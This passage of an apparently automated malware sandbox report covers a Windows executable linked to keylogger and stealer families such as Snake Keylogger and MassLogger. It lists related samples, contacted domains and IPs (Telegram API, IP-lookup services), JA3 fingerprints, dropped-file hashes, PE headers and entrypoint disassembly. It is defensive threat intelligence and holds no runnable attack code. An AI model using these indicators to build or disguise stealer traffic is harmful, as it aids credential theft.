                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                              TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                      3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        104.21.16.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                        • www.kkpmoneysocial.top/86am/
                                                                        JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                        158.101.44.242yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • checkip.dyndns.org/
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                        • checkip.dyndns.org/
                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        PK5pHX4Gu5.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        checkip.dyndns.comrwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 132.226.8.169
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 132.226.247.73
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 158.101.44.242
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 193.122.130.0
                                                                        reallyfreegeoip.orgrwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.112.1
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.64.1
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.32.1
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.48.1
                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.96.1
                                                                        yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 104.21.112.1
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        api.telegram.orgYDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                        • 149.154.167.220
                                                                        TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                        • 149.154.167.220
                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TELEGRAMRUYDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                        • 149.154.167.220
                                                                        TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                        • 149.154.167.220
                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        CLOUDFLARENETUSAxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.67.186.192
                                                                        k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.96.1
                                                                        rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.112.1
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                        • 188.114.96.3
                                                                        tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.36.62
                                                                        uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.64.1
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.80.1
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.32.1
                                                                        ORACLE-BMC-31898USrwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.6.168
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 158.101.44.242
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 193.122.130.0
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 193.122.6.168

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        54328bd36c14bd82ddaa0c04b25ed9adrwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 104.21.16.1
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                        • 104.21.16.1
                                                                        VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 104.21.16.1
                                                                        3b5074b1b5d032e5620f69f9f700ff0eKtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                        • 149.154.167.220
                                                                        J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\Lymnaeidae

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):209408
                                                                        Entropy (8bit):7.796469735926368
                                                                        Encrypted:false
                                                                        SSDEEP:6144:oSZvr+4W4wDeSz+5qon1swbIni0l0Cs4PyvUre:omj+t1DeSz+7n11bii0c4YOe
                                                                        MD5:EAE09EA8F9F911C9A80028FD21B2481B
                                                                        SHA1:9F05D89C56816F1664E5149E11A319A672BE2462
                                                                        SHA-256:B8CE763CE8055A3D490043F66DCEE6148AEB9A5392CBF7CFF70B171FC43C32B8
                                                                        SHA-512:C699C5468BB768F4E9C72047CB0A27654547B1A7F8F6797E5573D7DF0DE5680CC297AE7AB4D18F05C0CA9B675CDE15BEFA784CB4E287751D5F20D99AA49A0B3F
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:}l.JAKZHV206..BK.HR206XJ.KZHR206XJBKZHR206XJBKZHR206XJBKZHR2.6XJLT.FR.9.y.C..i.ZYEx:0$=:3_.U9$,$.h0W.D-$b"4h.}c.5%&.tE_8.6XJBKZH:"..t;.5v9.L.G.4ph%6mC.HS..5q9.L.G.4.:.6`.^HD;.5hk;L.G.4ph!6.C.H.#!#v9.L06XJBKZHR206XJBK.r'.06XJ..ZH.346,.B.ZHR206XJ.KyIY396X.CKZ.S206XJm.ZHR"06X.CKZH.20&XJBIZHW206XJBK_HR206XJB.YHR606.q@KXHR.06HJB[ZHR2 6XZBKZHR2 6XJBKZHR206._@K.HR20VZJ.Z[HR206XJBKZHR206XJBKZHR206..CKFHR206XJBKZHR206XJBKZHR206XJ.FXH.206XJBKZHR20.YJ.JZHR206XJBKZHR206XJBKZHR206v>'3.HR2(.YJB[ZHR.16XNBKZHR206XJBKZHr20Vv8&*.)R2.[XJB.[HR\06X.CKZHR206XJBKZH.20vv.#?;HR2..XJBkXHR$06X@@KZHR206XJBKZH.20.v8199HR2.'YJB+XHR 16Xj@KZHR206XJBKZH.20vXJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR206XJBKZHR2

                                                                        C:\Users\user\AppData\Local\Temp\autE508.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):195396
                                                                        Entropy (8bit):7.981144573693196
                                                                        Encrypted:false
                                                                        SSDEEP:3072:SSiSck4DEAGgYdvNIYHOCEwIfCz5tmgZyXUV5KQWEfFfLnZtZFM5B61w4p5Ub0ut:ShfDEAGgYdvWkOC0fM5Ig6UuwnNFMvhJ
                                                                        MD5:8277119BAEECDBFC1409935EA2642F9D
                                                                        SHA1:D80D86491DADE16AF764779A4B975ACB38C9E6E6
                                                                        SHA-256:4B1F8C21DBC199F122A0D63AFC192368F9E6390347EC7C9DDE6DE4A8A81F44DD
                                                                        SHA-512:49128760D706E7DCDAD769BD2A557C46584AA805CE5A8665850DE0DED9061435C9766833B140CD1248A65DC47E7C1AE02943B373E5E0339F3CE48EE4374CBC98
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:EA06..2...9.....H.L..m>.K.R*@.Eb.......B...:..E2..T.....C...0j.f.x.L$.......d..$..0..(..%.E4.E..8..K&.](...P..3...7t..&.i......D.mm....?.Nkq...sH..a6.Dk. .Ah... ..C6.......F.x.P|~.......Dzg4.K=.(....T..&.3...*......V.0.."..?@.."%2.I...Mj.W.P.|.k\..".6.M.w....H.l..jE*.[.Zd.j.h.......+..\(.).V.X..l.S..~.t.0....V.%..Na.4.5(...O..9p.Q(..@(1..........,]..iT.SR.a+`.........j..G...].....v.(| ............G...N&3.......<....@..Z..>K..........a..e.y0..7...j...L6..e..Z.d...6..B..........c..l .S.......<..w.....2.../..K..(.&.~.X>W.e@...qcs)..S...sT.._.6.r.t......c._....L~.=8..#....N.k..{'59...[.Y...GJ.7.Ui[...].Pf........fS......V...m.k..pt5..>..V.(7..S.rke.e.._(T.vh........*.H.L.^K^....Z+0...9n.h+ .."R..\4S{...B.Z.;J...3.M.T.o..K.L|{}.(......ck..F ...7....j.........t./;....k.....o.1J."...f..E....[.X.ZG6....^.gE.v&.j.j{T.]"W......Q.....Y...)..m.......)"...*.6.m.....Mx..}.%j.e.y.`8D~...z3.5n3...f.n......W...=o.Q.....A..-.M...}..d5{.....S....Je2.V.4.g....M.....

                                                                        C:\Users\user\AppData\Local\Temp\autE8FF.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\njVvgA8pEB.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):195396
                                                                        Entropy (8bit):7.981144573693196
                                                                        Encrypted:false
                                                                        SSDEEP:3072:SSiSck4DEAGgYdvNIYHOCEwIfCz5tmgZyXUV5KQWEfFfLnZtZFM5B61w4p5Ub0ut:ShfDEAGgYdvWkOC0fM5Ig6UuwnNFMvhJ
                                                                        MD5:8277119BAEECDBFC1409935EA2642F9D
                                                                        SHA1:D80D86491DADE16AF764779A4B975ACB38C9E6E6
                                                                        SHA-256:4B1F8C21DBC199F122A0D63AFC192368F9E6390347EC7C9DDE6DE4A8A81F44DD
                                                                        SHA-512:49128760D706E7DCDAD769BD2A557C46584AA805CE5A8665850DE0DED9061435C9766833B140CD1248A65DC47E7C1AE02943B373E5E0339F3CE48EE4374CBC98
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:EA06..2...9.....H.L..m>.K.R*@.Eb.......B...:..E2..T.....C...0j.f.x.L$.......d..$..0..(..%.E4.E..8..K&.](...P..3...7t..&.i......D.mm....?.Nkq...sH..a6.Dk. .Ah... ..C6.......F.x.P|~.......Dzg4.K=.(....T..&.3...*......V.0.."..?@.."%2.I...Mj.W.P.|.k\..".6.M.w....H.l..jE*.[.Zd.j.h.......+..\(.).V.X..l.S..~.t.0....V.%..Na.4.5(...O..9p.Q(..@(1..........,]..iT.SR.a+`.........j..G...].....v.(| ............G...N&3.......<....@..Z..>K..........a..e.y0..7...j...L6..e..Z.d...6..B..........c..l .S.......<..w.....2.../..K..(.&.~.X>W.e@...qcs)..S...sT.._.6.r.t......c._....L~.=8..#....N.k..{'59...[.Y...GJ.7.Ui[...].Pf........fS......V...m.k..pt5..>..V.(7..S.rke.e.._(T.vh........*.H.L.^K^....Z+0...9n.h+ .."R..\4S{...B.Z.;J...3.M.T.o..K.L|{}.(......ck..F ...7....j.........t./;....k.....o.1J."...f..E....[.X.ZG6....^.gE.v&.j.j{T.]"W......Q.....Y...)..m.......)"...*.6.m.....Mx..}.%j.e.y.`8D~...z3.5n3...f.n......W...=o.Q.....A..-.M...}..d5{.....S....Je2.V.4.g....M.....

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.087555999620431
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:njVvgA8pEB.exe
                                                                        File size:1'118'720 bytes
                                                                        MD5:d689d0763faaa679d5df32a3c14f9708
                                                                        SHA1:928a1e168d684e9a1179d6c023e52cb33da1c26b
                                                                        SHA256:d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c
                                                                        SHA512:71d6c572fb1edbca45a8864e51bbb48ca5e98fd66a002b7437efa66a3bc67d583bb99a433e37a054e92d121f556019ad2a81d6c49e72094be7d993c0e36a2e05
                                                                        SSDEEP:24576:lu6J33O0c+JY5UZ+XC0kGso6Fa0iaRxkjVelX0/DwU3AuWY:nu0c++OCvkGs9Fa0tYk09oY
                                                                        TLSH:5535BE2273DDC360CB669173BF2AB7016EBF3C614630B95B1F980D7DA950162262D7A3
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                        File Icon

                                                                        Icon Hash:aaf3e3e3938382a0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x427dcd
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x674FAD93 [Wed Dec 4 01:17:07 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F8C74BB58CAh
                                                                        jmp 00007F8C74BA8694h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [esp+10h]
                                                                        mov ecx, dword ptr [esp+14h]
                                                                        mov edi, dword ptr [esp+0Ch]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F8C74BA881Ah
                                                                        cmp edi, eax
                                                                        jc 00007F8C74BA8B7Eh
                                                                        bt dword ptr [004C31FCh], 01h
                                                                        jnc 00007F8C74BA8819h
                                                                        rep movsb
                                                                        jmp 00007F8C74BA8B2Ch
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F8C74BA89E4h
                                                                        mov eax, edi
                                                                        xor eax, esi
                                                                        test eax, 0000000Fh
                                                                        jne 00007F8C74BA8820h
                                                                        bt dword ptr [004BE324h], 01h
                                                                        jc 00007F8C74BA8CF0h
                                                                        bt dword ptr [004C31FCh], 00000000h
                                                                        jnc 00007F8C74BA89BDh
                                                                        test edi, 00000003h
                                                                        jne 00007F8C74BA89CEh
                                                                        test esi, 00000003h
                                                                        jne 00007F8C74BA89ADh
                                                                        bt edi, 02h
                                                                        jnc 00007F8C74BA881Fh
                                                                        mov eax, dword ptr [esi]
                                                                        sub ecx, 04h
                                                                        lea esi, dword ptr [esi+04h]
                                                                        mov dword ptr [edi], eax
                                                                        lea edi, dword ptr [edi+04h]
                                                                        bt edi, 03h
                                                                        jnc 00007F8C74BA8823h
                                                                        movq xmm1, qword ptr [esi]
                                                                        sub ecx, 08h
                                                                        lea esi, dword ptr [esi+08h]
                                                                        movq qword ptr [edi], xmm1
                                                                        lea edi, dword ptr [edi+08h]
                                                                        test esi, 00000007h
                                                                        je 00007F8C74BA8875h
                                                                        bt esi, 03h
                                                                        jnc 00007F8C74BA88C8h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ASM] VS2013 build 21005
                                                                        • [ C ] VS2013 build 21005
                                                                        • [C++] VS2013 build 21005
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2013 UPD4 build 31101
                                                                        • [RES] VS2013 build 21005
                                                                        • [LNK] VS2013 UPD4 build 31101

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x489cc.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000x711c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xc70000x489cc0x48a006a9cb392d4f7a484b35a234ac56c19edFalse0.9099948902753873data7.852726943747123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x1100000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                        RT_RCDATA0xcf7b80x3fc93data1.0003291651835096
                                                                        RT_GROUP_ICON0x10f44c0x76dataEnglishGreat Britain0.6610169491525424
                                                                        RT_GROUP_ICON0x10f4c40x14dataEnglishGreat Britain1.25
                                                                        RT_GROUP_ICON0x10f4d80x14dataEnglishGreat Britain1.15
